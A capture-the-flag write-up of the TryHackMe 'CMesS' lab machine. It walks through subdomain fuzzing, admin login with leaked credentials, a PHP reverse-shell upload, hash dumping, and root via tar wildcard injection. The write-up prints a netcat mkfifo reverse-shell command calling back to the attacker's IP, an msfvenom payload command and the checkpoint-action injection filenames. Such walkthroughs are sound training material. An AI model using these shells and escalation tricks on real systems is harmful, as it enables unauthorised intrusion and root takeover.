CMesS — TryHackMe — WriteUp
Hello. I’m Rahmos. Here is my CMesS— TryHackMe — WriteUp. Check it out!
First, deploy the machine and nmap for opened ports
nmap -A -p- -T4 -v <ip>
There are 2 ports opened: 22 (SSH) and 80 (HTTP). First, add cmess.thm to your /etc/hosts and then access the website.
Next, scan for hidden dirs using gobuster:
gobuster dir -u <ip>:80 -w /path-to-wordlist
Well there are many hidden dirs here! Let’s enumerate one by one.
There’s not much I could find at these hidden dirs. Let’s start fuzzing sub domain as the hint said. I will use a tool called wfuzz and this wordlist
wfuzz -c -f cmess.txt -w /seclists/Discovery/DNS/subdomains-top1million-5000.txt -u “http://cmess.thm/" -H “Host: FUZZ.cmess.thm” — hw 290
After wfuzz finished, cat cmess.txt to see the result:
Now I’ve got the subdomain: dev
So let’s add this subdomain(dev.cmess.thm) to /etc/hosts and access it.
Now I’ve got the credential to login: andre@cmess.thm : KPFTN_f2yxe%
Access cmess.thm/admin to login and you will be in the admin dashboard:
Then, go to Content ->File Manager -> config.php to look for sensitive crendentials
After that, navigate to Content -> File Manager and upload the reverse shell.
Start a listener on your machine:
nc -lvnp 4444
Then access from browser: cmess.thm/assets/php-reverse-shell.php and you will gain a shell!
Spawn a tty shell for stability using python:
python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
export TERM=xterm
Up to now, I cannot get the 1st flag in andre home’s folder due to permission. But I can login to mysql using the credential in config.php above:
mysql -u root -p
Enter the password above and you can access the database!
Look around for andre’s password and it will be stored in table user from database gila.
You can enter the following cmd in the same order to show databases, tables and get into user:
show databases;
use gila;
show tables;
select * from user;
It’s a bcrypt hash. Crack this hash to get andre’s password using hashcat:
hashcat -a 0 -w 3 -m 3200 -O andre.txt rockyou.txt
Bcrypt will take a very long time to crack, so be patient! However, after a long time waiting, I’ve got into the rabbit hole! 😔 The password I’ve found is the same password of andre to login to the website!
Let’s try another way. cd to /tmp to see if anything intersting here.
Well there is a backup tar here! Let’s transfer this file to our machine. Start a http server using python:
python -m http.server 9000
On your machine:
wget http://<ip>:9000/andre_backup.tar.gz
Then, extract this file.
tar -xvf andre_backup.tar.gz
Well there is a note file. Let’s see what’s inside:
Looks like it’s a cronjob running to backup something to this file. It will be used for priv esc, but not now!
So, this time I will use LinEnum.sh to enum information on this machine. You can transfer the script to the target machine again by using python and wget like above.
After the script has done, I found a interesting hidden file in /opt: .password.bak
Let’s see its content:
Yas! Now I’ve got andre’s password! su to andre and get the first flag:
Now it’s time for priv esc to own root. I’ve known before that there is a cronjob backuping something. There’s a backup folder inside andre’s home, so let’s see what’s inside.
So, the backup cronjob will extract the tar file in /tmp to this backup folder.
To make sure, run cat /etc/crontab:
So, I will use tar so spawn a root shell for us. It’s called Wildcard Injection. You can read more about it here. Because the cronjob run as root, so will have the root shell!
First, use msfvenom to generate a netcat reverse shell code:
msfvenom -p cmd/unix/reverse_netcat lhost=<your-VPN-ip> lport=5555 R
Then, copy everything in the red box. Return to the target machine, run the following commands in /backup:
echo “mkfifo /tmp/cmfs; nc <your-VPN-ip> 5555 0</tmp/cmfs | /bin/sh >/tmp/cmfs 2>&1; rm /tmp/cmfs” > shell.sh
echo “ ” > “ — checkpoint-action=exec=sh shell.sh”
echo “ ” > — checkpoint=1
Then, start a listener on port 5555:
nc -lvnp 5555
Now I’ve got the root shell! Get the final flag in /root.
The end.
HAPPY HACKING
